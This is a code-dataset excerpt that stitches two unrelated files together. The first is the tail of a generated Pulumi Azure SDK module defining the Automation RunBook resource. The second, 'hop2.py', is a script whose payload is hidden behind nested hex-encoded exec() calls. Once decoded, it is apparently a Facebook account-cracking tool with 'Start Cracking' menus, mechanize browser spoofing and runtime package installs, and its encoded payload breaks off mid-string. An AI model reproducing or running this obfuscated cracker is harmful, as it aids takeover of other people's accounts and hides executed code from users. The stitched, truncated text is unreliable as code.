A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class RunBook(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RunBookJobScheduleArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
log_progress: Optional[pulumi.Input[bool]] = None,
log_verbose: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runbook_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Automation Runbook.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.automation.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="Basic")
example_run_book = azure.automation.RunBook("exampleRunBook",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
automation_account_name=example_account.name,
log_verbose=True,
log_progress=True,
description="This is an example runbook",
runbook_type="PowerShellWorkflow",
publish_content_link=azure.automation.RunBookPublishContentLinkArgs(
uri="https://raw.githubusercontent.com/Azure/azure-quickstart-templates/c4935ffb69246a6058eb24f54640f53f69d3ac9f/101-automation-runbook-getvms/Runbooks/Get-AzureVMTutorial.ps1",
))
```
## Import
Automation Runbooks can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/runBook:RunBook Get-AzureVMTutorial /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/runbooks/Get-AzureVMTutorial
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] content: The desired content of the runbook.
:param pulumi.Input[str] description: A description for this credential.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[bool] log_progress: Progress log option.
:param pulumi.Input[bool] log_verbose: Verbose log option.
:param pulumi.Input[str] name: Specifies the name of the Runbook. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']] publish_content_link: The published runbook content link.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_type: The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RunBookArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Automation Runbook.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.automation.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="Basic")
example_run_book = azure.automation.RunBook("exampleRunBook",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
automation_account_name=example_account.name,
log_verbose=True,
log_progress=True,
description="This is an example runbook",
runbook_type="PowerShellWorkflow",
publish_content_link=azure.automation.RunBookPublishContentLinkArgs(
uri="https://raw.githubusercontent.com/Azure/azure-quickstart-templates/c4935ffb69246a6058eb24f54640f53f69d3ac9f/101-automation-runbook-getvms/Runbooks/Get-AzureVMTutorial.ps1",
))
```
## Import
Automation Runbooks can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/runBook:RunBook Get-AzureVMTutorial /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/runbooks/Get-AzureVMTutorial
```
:param str resource_name: The name of the resource.
:param RunBookArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RunBookArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RunBookJobScheduleArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
log_progress: Optional[pulumi.Input[bool]] = None,
log_verbose: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runbook_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RunBookArgs.__new__(RunBookArgs)
if automation_account_name is None and not opts.urn:
raise TypeError("Missing required property 'automation_account_name'")
__props__.__dict__["automation_account_name"] = automation_account_name
__props__.__dict__["content"] = content
__props__.__dict__["description"] = description
__props__.__dict__["job_schedules"] = job_schedules
__props__.__dict__["location"] = location
if log_progress is None and not opts.urn:
raise TypeError("Missing required property 'log_progress'")
__props__.__dict__["log_progress"] = log_progress
if log_verbose is None and not opts.urn:
raise TypeError("Missing required property 'log_verbose'")
__props__.__dict__["log_verbose"] = log_verbose
__props__.__dict__["name"] = name
__props__.__dict__["publish_content_link"] = publish_content_link
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if runbook_type is None and not opts.urn:
raise TypeError("Missing required property 'runbook_type'")
__props__.__dict__["runbook_type"] = runbook_type
__props__.__dict__["tags"] = tags
super(RunBook, __self__).__init__(
'azure:automation/runBook:RunBook',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RunBookJobScheduleArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
log_progress: Optional[pulumi.Input[bool]] = None,
log_verbose: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runbook_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'RunBook':
"""
Get an existing RunBook resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] content: The desired content of the runbook.
:param pulumi.Input[str] description: A description for this credential.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[bool] log_progress: Progress log option.
:param pulumi.Input[bool] log_verbose: Verbose log option.
:param pulumi.Input[str] name: Specifies the name of the Runbook. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']] publish_content_link: The published runbook content link.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_type: The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RunBookState.__new__(_RunBookState)
__props__.__dict__["automation_account_name"] = automation_account_name
__props__.__dict__["content"] = content
__props__.__dict__["description"] = description
__props__.__dict__["job_schedules"] = job_schedules
__props__.__dict__["location"] = location
__props__.__dict__["log_progress"] = log_progress
__props__.__dict__["log_verbose"] = log_verbose
__props__.__dict__["name"] = name
__props__.__dict__["publish_content_link"] = publish_content_link
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["runbook_type"] = runbook_type
__props__.__dict__["tags"] = tags
return RunBook(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Output[str]:
"""
The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@property
@pulumi.getter
def content(self) -> pulumi.Output[str]:
"""
The desired content of the runbook.
"""
return pulumi.get(self, "content")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for this credential.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="jobSchedules")
def job_schedules(self) -> pulumi.Output[Sequence['outputs.RunBookJobSchedule']]:
return pulumi.get(self, "job_schedules")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="logProgress")
def log_progress(self) -> pulumi.Output[bool]:
"""
Progress log option.
"""
return pulumi.get(self, "log_progress")
@property
@pulumi.getter(name="logVerbose")
def log_verbose(self) -> pulumi.Output[bool]:
"""
Verbose log option.
"""
return pulumi.get(self, "log_verbose")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Runbook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="publishContentLink")
def publish_content_link(self) -> pulumi.Output[Optional['outputs.RunBookPublishContentLink']]:
"""
The published runbook content link.
"""
return pulumi.get(self, "publish_content_link")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="runbookType")
def runbook_type(self) -> pulumi.Output[str]:
"""
The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
"""
return pulumi.get(self, "runbook_type")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 46.294606 | 239 | 0.662096 |
4a2129dee269a2ba6bf29742ef51ee5b1200479f | 100,980 | py | Python | hop2.py | BDAlfajAhmedJhenida/HOP | 691c82e6817be0b4d4c54ba014fc02188eba6192 | [
"MIT"
] | null | null | null | hop2.py | BDAlfajAhmedJhenida/HOP | 691c82e6817be0b4d4c54ba014fc02188eba6192 | [
"MIT"
] | null | null | null | hop2.py | BDAlfajAhmedJhenida/HOP | 691c82e6817be0b4d4c54ba014fc02188eba6192 | [
"MIT"
] | null | null | null | #Coded By : Muhammad Hamza
#Facebook : Muhammad Hamza
#Github : https://github.com/Hamzahash
#Whatsapp : +92309-7992202
#Youtube : HOP Anonymous
import base64
exec(base64.b16decode('23436F646564204279203A204D7568616D6D61642048616D7A610A2346616365626F6F6B203A204D7568616D6D61642048616D7A610A234769746875622020203A2068747470733A2F2F6769746875622E636F6D2F48616D7A61686173680A235768617473617070203A202B39323330392D373939323230320A23596F757475626520203A20484F5020416E6F6E796D6F75730A696D706F7274206261736536340A65786563286261736536342E6231366465636F6465282732333433364636343635363432303432373932303341323034443735363836313644364436313634323034383631364437413631304132333436363136333635363236463646364232303341323034443735363836313644364436313634323034383631364437413631304132333437363937343638373536323230323032303341323036383734373437303733334132463246363736393734363837353632324536333646364432463438363136443741363136383631373336383041323335373638363137343733363137303730323033413230324233393332333333303339324433373339333933323332333033323041323335393646373537343735363236353230323033413230343834463530323034313645364636453739364436463735373330413639364437303646373237343230363236313733363533363334304136353738363536333238363236313733363533363334324536323331333636343635363336463634363532383237333233333332333133323436333733353337333333373332333234363336333233363339333634353332343633373330333733393337333433363338333634363336343533303431333233333332333033363333333634363336333433363339333634353336333733333434333733353337333433363336333234343333333833303431333233333332333033343436333733323336333933363337333633393336343533363331333634333336343333373339333233303335333733373332333633393337333433373334333633353336343533323330333433323337333933333431333434343337333533363338333633313336343433363434333633313336333433323330333433383336333133363434333734313336333133303431333233333332333033353333333634363337333533373332333633333336333533323330333334313332333033353330333733393337333433363338333634363336343533333332333233323330343133323333333233303334333433363436333634353336343633373334333233303335333233363335333633333336343633363334333633353332333033343339333733343332343533323330333034313330343133323333333433393336343433373330333634363337333233373334333233303336343433363436333633343337333533363433333633353330343133303431333733343337333233373339333334313332333033323330333233303332333033303431333233303332333033323330333233303336333933363434333733303336343633373332333733343332333033363436333733333332343333373333333733393337333333323433333733343336333933363434333633353332343333363334333633313337333433363335333733343336333933363434333633353332343333373332333633313336343533363334333634363336343433323433333633383336333133373333333633383336343333363339333633323332343333373332333633353332343333373334333633383337333233363335333633313336333433363339333634353336333733323433333634313337333333363436333634353332343333373335333733323336343333363433333633393336333233323433333633333336343633363436333634323336333933363335333634333336333933363332333234333336333733363335333733343337333033363331333733333337333333323433333634343336333533363333333633383336333133363435333633393337343133363335333234333337333233363335333733313337333533363335333733333337333433373333333034313332333033323330333233303332333033363336333733323336343633363434333233303336343433373335333634333337333433363339333733303337333233363436333633333336333533373333333733333336333933363435333633373332343533373330333634363336343633363433333233303336333933363434333733303336343633373332333733343332333033353334333633383337333233363335333633313336333433353330333634363336343633363433333034313332333033323330333233303332333033363336333733323336343633363434333233303337333233363335333733313337333533363335333733333337333433373333333234353336333533373338333633333336333533373330333733343336333933363436333634353337333333323330333633393336343433373330333634363337333233373334333233303334333333363436333634353336343533363335333633333337333433363339333634363336343533343335333733323337333233363436333733323330343133323330333233303332333033323330333633363337333233363436333634343332333033363434333633353336333333363338333633313336343533363339333734313336333533323330333633393336343433373330333634363337333233373334333233303334333233373332333634363337333733373333333633353337333233303431333633353337333833363333333633353337333033373334333233303334333933363434333733303336343633373332333733343334333533373332333733323336343633373332333334313330343133323330333233303332333033323330333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733373330333633393337333033333332333233303336333933363435333733333337333433363331333634333336343333323330333733323336333533373331333733353336333533373333333733343337333333323337333233393330343133323330333233303332333033323330333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733373330333633393337333033333332333233303336333933363435333733333337333433363331333634333336343333323330333634343336333533363333333633383336333133363435333633393337343133363335333233373332333933303431333233303332333033323330333233303336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333733303337333933373334333633383336343633363435333333323332333033363338333633333337333233363331333633333336343233323435333733303337333933323337333233393330343133303431333233333334333233373332333634363337333733373333333633353337333233323330333533333336333533373334333733343336333933363435333633373330343133373332333633353336343333363436333633313336333433323338333733333337333933373333333233393330343133373333333733393337333333323435333733333336333533373334333633343336333533363336333633313337333533363433333733343336333533363435333633333336343633363334333633393336343533363337333233383332333733373335333733343336333633333338333233373332333933303431333633323337333233323330333334343332333033363434333633353336333333363338333633313336343533363339333734313336333533323435333433323337333233363436333733373337333333363335333733323332333833323339333034313336333233373332333234353337333333363335333733343335343633363338333633313336343533363334333634333336333533353436333733323336343633363332333634363337333433373333333233383334333633363331333634333337333333363335333233393330343133363332333733323332343533373333333633353337333433353436333633383336333133363435333633343336343333363335333534363337333233363335333633363337333233363335333733333336333833323338333634343336333533363333333633383336333133363435333633393337343133363335333234353335343633363338333733343337333433373330333234353334333833353334333533343335333033353332333633353336333633373332333633353337333333363338333533303337333233363436333633333336333533373333333733333336343633373332333233383332333933323433333634343336333133373338333534363337333433363339333634343336333533333434333333313332333933303431333633323337333233323435333633313336333433363334333633383336333533363331333633343336333533373332333733333332333033333434333233303335343233323338333233373337333533373333333633353337333233323434333633313336333733363335333634353337333433323337333234333332333733343334333633313336343333373336333633393336343233323436333333313332343533333336333234353333333033323330333233383334343333363339333634353337333533373338333334323332333033353335333334323332333033343331333634353336333433373332333634363336333933363334333233303333333433323435333333343332343533333332333334323332333033343435333533383333333533333335333233303334333233373335333633393336343333363334333234363334343233343436333533343333333533333335333333303333333633323339333233303335343233343336333433323334333133343435333234363334333633343332333333343334333133333432333433363334333233343331333533363332343633333331333333303333333633323435333333303332343533333330333234353333333233333336333234353333333633333338333334323334333633343332333433323335333633323436333333343333333533333339333333303333333433333331333333363333333033333432333433363334333233343334333434343332343633373432333633343336333533363435333733333336333933373334333733393333343433333333333234353333333033323433333733373336333933363334333733343336333833333434333333313333333033333338333333303332343333363338333633353336333933363337333633383337333433333434333333313333333933333332333333303337343433333432333433363334333233343433333433333332343633363339333733343335343633343339333533343333343233343336333433323335333233353336333234363333333433333335333333393333333033333334333333313333333633333330333334323334333633343332333433333335333233323436333533303336343633373333333733343336333533343434333634363336333233363339333634333336333533333432333433363334333233343434333433363332343633363331333733333337333533373333333334323334333633343332333433323334333433323436333633313337333333373335333733333333343233343336333433323335333033343435333234363336333333363436333634343332343533363336333633313336333333363335333633323336343633363436333634323332343533363432333633313337333433363331333634353336333133333432333433363334333233343334333533363332343633343331333533333335333533353333333534363335343133333330333333303334333133343334333334323334333633343332333533333335333633323436333333353332343533333330333334323334333633343332333434363335333033323436333333313333343233343336333433323334333333343331333234363337333833333338333333363333343133363331333733323336343433363335333633313336333233363339333234343337333633333337333633313333343233353434333233373332333933353434333034313330343133363334333633353336333633323330333633353337333833363339333733343332333833323339333334313330343133303339333733303337333233363339333634353337333433323330333233323335343233323331333534343332333033343335333733383336333933373334333233323330343133303339333634363337333333323435333733333337333933373333333234353336333533373338333633393337333433323338333233393330343133303431333034313336333433363335333633363332333033363331333633333336333133363432333233383336333233323339333334313330343133323330333233303332333033323330333733373332333033333434333233303332333733363331333633383337333433363334333734313336343133363333333233373330343133323330333233303332333033323330333633343332333033333434333233303332333733323337333034313332333033323330333233303332333033363336333634363337333233323330333633393332333033363339333634353332333033373338333334313330343133323330333233303332333033323330333233303332333033323330333233303336333433323330333234323333343433323330333233373332333133323337333234323337333733353432333733323336333133363435333633343336343633363434333234353337333233363331333634353336333433363339333634353337333433323338333333303332343333363433333633353336343533323338333733373332333933323434333333313332333933353434333234323336333933303431333233303332333033323330333233303337333233363335333733343337333533373332333634353332333033363333333633353337333433363331333634323332333833363334333233393330343133303431333034313336333433363335333633363332333033363333333633353337333433363331333634323332333833363332333233393333343133303431333233303332333033323330333233303337333733323330333334343332333033323337333633313336333833373334333633343337343133363431333633333332333733303431333233303332333033323330333233303336333633363436333733323332333033363339333233303336333933363435333233303337333733333431333034313332333033323330333233303332333033323330333233303332333033323330333634313332333033333434333233303337333733323435333633393336343533363334333633353337333833323338333633393332333933303431333233303332333033323330333233303332333033323330333233303332333033373338333334343332333033373338333234353337333233363335333733303336343333363331333633333336333533323338333233373332333133323335333733333332333733323335333633393332343333323337333534333333333033333333333333333335343233323335333733333333343233333331333634343332333733323335333733333337333433373332333233383333333333333331333234323336343133323339333233393330343133323330333233303332333033323330333733383332333033323432333334343332333033323337333534333333333033333333333333333335343233333330333634343332333733303431333233303332333033323330333233303337333833323330333334343332333033373338333234353337333233363335333733303336343333363331333633333336333533323338333233373332333133333330333233373332343333323337333534333333333033333333333333333335343233333330333634343332333733323339333034313332333033323330333233303332333033373333333733393337333333323435333733333337333433363334333634363337333533373334333234353337333733373332333633393337333433363335333233383337333833323432333233373335343333363435333233373332333933303431333034313330343133363334333633353336333633323330333633383336333133363434333734313336333133323338333734313332333933333431333034313330333933363336333634363337333233323330333633353332333033363339333634353332333033373431333233303332343233323330333233373335343333363435333233373333343133303431333033393330333933373333333733393337333333323435333733333337333433363334333634363337333533373334333234353337333733373332333633393337333433363335333233383336333533323339333034313330333933303339333733333337333933373333333234353337333333373334333633343336343633373335333733343332343533363336333634333337333533373333333633383332333833323339333034313330333933303339333733343336333933363434333633353332343533373333333634333336333533363335333733303332333833333330333234353333333033333333333233393330343133363334333633353336333633323330333633383336343633373330333733333337333333323338333734313332333933333431333034313330333933363336333634363337333233323330333633353332333033363339333634353332333033373431333233303332343233323330333233373335343333363435333233373333343133303431333033393330333933373333333733393337333333323435333733333337333433363334333634363337333533373334333234353337333733373332333633393337333433363335333233383336333533323339333034313330333933303339333733333337333933373333333234353337333333373334333633343336343633373335333733343332343533363336333634333337333533373333333633383332333833323339333034313330333933303339333733343336333933363434333633353332343533373333333634333336333533363335333733303332333833333330333234353333333133323339333034313330343133323333333233333332333333323333333233333332333033343433333434363334333733343436333233303332333333323333333233333332333333323333333034313336333233363331333634353336343533363335333733323332333033333434333233303332333233323332333233323330343134353332333933353339333434353332333933353339333734353332333933343338333034353332333933353339333434353332333933353339333734353332333933353339333434353332333933353339333034353332333933353339333034353332333933353339333034353332333933353339333734353332333933353339333434353332333933353339333034353332333933353339333734353332333933353339333434353332333933353339333034353332333933353339333734353332333933353339333434353332333933353339333034353332333933353339333034353332333933353339333034353332333933353339333034353332333933353339333734353332333933353339333434353332333933353339333034353332333933353339333034353332333933353339333034353332333933353339333733303431343533323339333533393331343533323339333533393331343533323339333433383330343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393334343533323339333533393330343533323339333533393337343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393431343533323339333533393434343533323339333533393331343533323339333533393331343533323339333533393431343533323339333533393330343533323339333533393330343533323339333533393337343533323339333533393330343533323339333533393331343533323339333533393331343533323339333533393334343533323339333533393330343533323339333533393337343533323339333533393331333034313435333233393335333933313435333233393335333934313435333233393335333933303435333233393335333934343435333233393335333933313435333233393335333933313435333233393335333933313435333233393334333833303435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333933343435333233393335333933373435333233393335333933343435333233393335333933373435333233393335333933313435333233393334333833303435333233393334333833303435333233393335333933343435333233393335333934343435333233393335333933343435333233393335333934343435333233393335333933313435333233393335333933313435333233393334333833303435333233393335333933313435333233393335333933313330343134353332333933353339333134353332333933353339333434353332333933353339333034353332333933353339333734353332333933353339333134353332333933353339333134353332333933353339343134353332333933353339333034353332333933353339343434353332333933353339333134353332333933353339333134353332333933353339333134353332333933353339333134353332333933353339333134353332333933353339333134353332333933353339333134353332333933343338333034353332333933353339333434353332333933353339343434353332333933353339333434353332333933353339343434353332333933343338333034353332333933353339333134353332333933353339343134353332333933353339333034353332333933353339343434353332333933353339333133303431343533323339333533393331343533323339333533393331343533323339333433383330343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393334343533323339333533393330343533323339333533393337343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393334343533323339333533393434343533323339333533393330343533323339333533393431343533323339333533393330343533323339333533393337343533323339333533393331343533323339333533393334343533323339333533393330343533323339333533393337343533323339333533393331333034313435333233393335333934313435333233393335333934343435333233393334333833303435333233393335333934313435333233393335333934343435333233393335333934313435333233393335333934343435333233393334333833303435333233393335333934313435333233393335333934343435333233393335333934313435333233393335333934343435333233393335333934313435333233393335333934343435333233393335333934313435333233393335333934343435333233393335333934313435333233393335333933303435333233393335333933303435333233393335333933303435333233393335333933303435333233393335333934343435333233393335333934313435333233393335333934343435333233393334333833303435333233393335333934313435333233393335333934343330343133323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343330343133303431343533323339343534313333333233303334333333363436333633343336333533373332333233303332333033323330333334313332333033343434333733353336333833363331333634343336343433363331333633343332333033343338333633313336343433373431333633313330343134353332333934353431333333323330333433373336333933373334333633383337333533363332333233303332333033333431333233303336333833373334333733343337333033373333333334313332343633323436333633373336333933373334333633383337333533363332333234353336333333363436333634343332343633343338333633313336343433373431333633313336333833363331333733333336333833303431343533323339343534313333333233303334333633363331333633333336333533363332333634363336343633363432333334313332333033343434333733353336333833363331333634343336343433363331333633343332333033343338333633313336343433373431333633313330343134353332333934353431333333323330333533393336343633373335333733343337333533363332333633353332333033333431333233303334333833343436333533303332333033343331333634353336343633363435333733393336343433363436333733353337333333303431333034313332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333233323332333233323332333034313336333233363331333633333336343233323330333334343332333033333330333034313337333433363338333733323336333533363331333633343337333333323330333334343332333033353432333534343330343133373333333733353336333333363333333633353337333333373333333633363337333533363433333233303333343433323330333534323335343433303431333633333336333833363335333633333336343233373330333634363336333933363435333733343332333033333434333233303335343233353434333034313336343633363432333733333332333033333434333233303335343233353434333034313336333733363331333633373336333133363433333233303333343433323330333534323335343433303431333633393336333433363338333233303333343433323330333534323335343433303431333633393336333433323330333334343332333033353432333534343330343133303339333033393330333933303431333233333334343433363335333634353337333533303431333633343336333533363336333233303336343433363335333634353337333533323338333233393333343133303431333233303332333033323330333233303336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333633333336343333363335333633313337333233323337333233393330343133323330333233303332333033323330333733303337333233363339333634353337333433323330333633323336333133363435333634353336333533373332333034313332333033323330333233303332333033373330333733323336333933363435333733343330343133323330333233303332333033323330333733303337333233363339333634353337333433323330333233323335343233333331333534343332333033353333333733343336333133373332333733343332333033343333333733323336333133363333333634323336333933363435333633373332333233303431333233303332333033323330333233303337333033373332333633393336343533373334333233303332333233353432333333323335343433323330333433333337333233363331333633333336343233323330333433323337333933323330333434353337333533363434333633323336333533373332333233323330343133323330333233303332333033323330333733303337333233363339333634353337333433323330333233323335343233333333333534343332333033353335333733303336333433363331333733343336333533323332333034313332333033323330333233303332333033373330333733323336333933363435333733343332333033323332333534323333333433353434333233303334333633363436333634333336343333363436333733373332333033343434333633353332333033343436333634353332333033343336333633313336333333363335333633323336343633363436333634323332333233303431333233303332333033323330333233303337333033373332333633393336343533373334333233303330343133323330333233303332333033323330333634343336333533363435333733353335343633363331333633333337333433363339333634363336343533323338333233393330343133363334333633353336333633323330333634343336333533363435333733353335343633363331333633333337333433363339333634363336343533323338333233393333343133303431333233303332333033323330333233303336333133363333333733343332333033333434333233303337333233363331333733373335343633363339333634353337333033373335333733343332333833323337333433333336333833363436333634363337333333363335333233303334343633373330333733343336333933363436333634353332333033333435333334353333343533323330333233373332333933303431333233303332333033323330333233303336333933363336333233303336333133363333333733343332333033333434333334343332333233323332333334313330343133323330333233303332333033323330333233303332333033323330333233303337333033373332333633393336343533373334333233303332333233353337333733323336343633363435333633373332333033343339333634353337333033373335333733343332333233303431333233303332333033323330333233303332333033323330333233303332333033373334333633393336343433363335333234353337333333363433333633353336333533373330333233383333333133323339333034313332333033323330333233303332333033323330333233303332333033323330333634343336333533363435333733353332333833323339333034313332333033323330333233303332333033363335333634333336333933363336333233303336333133363333333733343332333033333434333334343332333233333331333233323333343133303431333233303332333033323330333233303332333033323330333233303332333033363333333733323336333133363333333634323332333833323339333034313332333033323330333233303332333033363335333634333336333933363336333233303336333133363333333733343332333033333434333334343332333233333332333233323333343133303431333233303332333033323330333233303332333033323330333233303332333033363436333733333332343533373333333733393337333333373334333633353336343433323338333233373336333333363433333633353336333133373332333233373332333933303431333233303332333033323330333233303332333033323330333233303332333033363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333033373339333733343336333833363436333634353333333233323330333234353336343533363436333234353337333033373339333233373332333933303431333233303332333033323330333233303336333533363433333633393336333633323330333633313336333333373334333233303333343433333434333233323333333333323332333334313330343133323330333233303332333033323330333233303332333033323330333233303336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333633333336343333363335333633313337333233323337333233393330343133323330333233303332333033323330333233303332333033323330333233303337333033373332333633393336343533373334333233303336333233363331333634353336343533363335333733323330343133323330333233303332333033323330333233303332333033323330333233303337333033373332333633393336343533373334333034313332333033323330333233303332333033323330333233303332333033323330333633383336333133363434333734313336333133323338333233373335333033363433333633353336333133373333333633353332333033353337333633313336333933373334333234353332333733323339333034313332333033323330333233303332333033323330333233303332333033323330333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733363337333633393337333433323330333733303337333533363433333634333332333033363436333733323336333933363337333633393336343533323330333634343336333133373333333733343336333533373332333233373332333933303431333233303332333033323330333233303332333033323330333233303332333033363338333633313336343433373431333633313332333833323337333533343336343633363436333634333332333033343338333633313337333333323330333533353337333033363334333633313337333433363335333633343332333733323339333034313332333033323330333233